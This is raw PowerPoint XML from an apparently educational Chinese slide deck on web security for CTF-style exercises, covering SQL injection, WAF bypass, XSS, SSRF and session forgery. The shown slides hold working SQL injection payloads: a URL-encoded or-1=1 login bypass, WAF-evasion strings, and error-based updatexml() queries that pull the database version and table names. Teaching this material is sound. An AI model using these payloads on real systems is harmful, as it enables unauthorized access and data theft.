            <a:endParaRPr lang="mr-IN" dirty="0"/>
          </a:p>
          <a:p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1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mr-IN" dirty="0" smtClean="0"/>
              <a:t>‘=’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mr-IN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66" y="2087011"/>
            <a:ext cx="115189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9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 err="1"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1"/>
              <a:t>login.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>=%27%20%6f%72%20%31%3d%31%23&amp;password=1234</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一般</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>会过滤掉这种非法请求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>0'='0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>'+1-1-'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>’=‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>绕过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等限制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那下面的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语句，怎么注入？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SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>TABLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1 LIMIT 0, $l;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>首先，查找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手册或者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endParaRPr lang="mr-I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824" y="3066045"/>
            <a:ext cx="6337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6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上图为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的语法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24" y="3172738"/>
            <a:ext cx="8674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3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所以，其实这算是一个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注入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前提，打开显示错误模式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>insert语句中人为构造语法错误</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>函数是MYSQL对XML文档数据进行查询和修改的XPATH函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(1,concat(0x7e,(version())),0) or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(0,concat(0x7e,(SELECT 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table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=database() limit 0,1)),0) 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1003</TotalTime>
  <Words>805</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>105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Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>DengXian</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>Mangal</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>等线 Light</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Gallery</vt:lpstr>
      <vt:lpstr>web类</vt:lpstr>
      <vt:lpstr>Sql注入</vt:lpstr>
      <vt:lpstr>如何注入&amp;绕过waf</vt:lpstr>
      <vt:lpstr>False SQL Injection and Advanced Blind SQL Injection-高级盲注 </vt:lpstr>
      <vt:lpstr>例子</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>那下面的sql语句，怎么注入？</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>所以，其实这算是一个mysql insert注入</vt:lpstr>
      <vt:lpstr>其他方法</vt:lpstr>
      <vt:lpstr>前端脚本类 </vt:lpstr>
      <vt:lpstr>配合一些小的对称加密算法</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Xss案例</vt:lpstr>
      <vt:lpstr>xss</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SSRF漏洞</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>MISC杂项</vt:lpstr>
      <vt:lpstr>对于前端限制的内容</vt:lpstr>
      <vt:lpstr>Session伪造</vt:lpstr>
      <vt:lpstr>当然了，还有老生常谈的弱口令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web类</dc:title>
  <dc:creator>梁志邦</dc:creator>
  <cp:lastModifiedBy>梁志邦</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-11-29T23:17:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-01T07:04:44Z</dcterms:modified>
</cp:coreProperties>
</file>